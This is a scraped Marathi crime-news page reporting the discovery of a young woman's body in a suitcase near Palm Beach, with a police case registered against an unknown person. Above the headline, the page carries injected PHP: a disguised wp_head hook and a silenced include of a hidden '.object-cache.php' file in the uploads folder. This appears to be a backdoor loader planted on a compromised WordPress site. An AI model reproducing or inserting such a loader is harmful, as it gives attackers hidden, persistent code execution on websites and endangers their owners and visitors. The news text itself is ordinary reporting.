add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पामबीच परिसरात सुटकेसमध्ये मृतदेह – SOCH INDIA
Menu

अपराध समाचार
पामबीच परिसरात सुटकेसमध्ये मृतदेह

nobanner

पामबीच परिसरात चाणक्य शिक्षण संस्थेनजीक सोमवारी एका सुटकेसमध्ये तरुणीचा मृतदेह आढळला. तिची ओळख अद्याप पटलेली नाही. या प्रकरणी एनआरआय पोलीस ठाण्यात गुन्हा नोंदवण्यात आला आहे. तिचे वय २२ ते २५ वर्षांदरम्यान असावे, असा अंदाज पोलिसांनी वर्तवला आहे. शवविच्छेदन अहवाल आल्यानंतर अधिक माहिती मिळेल, असे पोलिसांनी सांगितले.
करावे गावात पाम बीच येथील चाणक्य शिक्षण संस्थेनजीक असलेल्या महेंद्र तांडेल यांच्या मालकीच्या मोकळ्या जागेत एक सुटकेस आढळली. सुटकेसजवळ रक्ताही सांडल्याचे दिसत होते. या बाबत पोलिसांना माहिती देण्यात आल्यानंतर एनआरआय पोलिसांनी घटनास्थळी पाहणी केली. सुटकेस उघडली असता, त्यात तरुणीचा मृतदेह आढळला. तिचा गळा कापून मुंडके प्लास्टिकच्या पिशवीत बांधले होते. मृतदेह शवविच्छेदनासाठी वाशी येथील पालिका रुग्णालयात पाठवण्यात आला आहे. अज्ञात व्यक्तीविरोधात एनआरआय पोलीस ठाण्यात गुन्हा नोंदविला आहे, अशी माहिती आयुक्त हेमंत नगराळे यांनी दिली.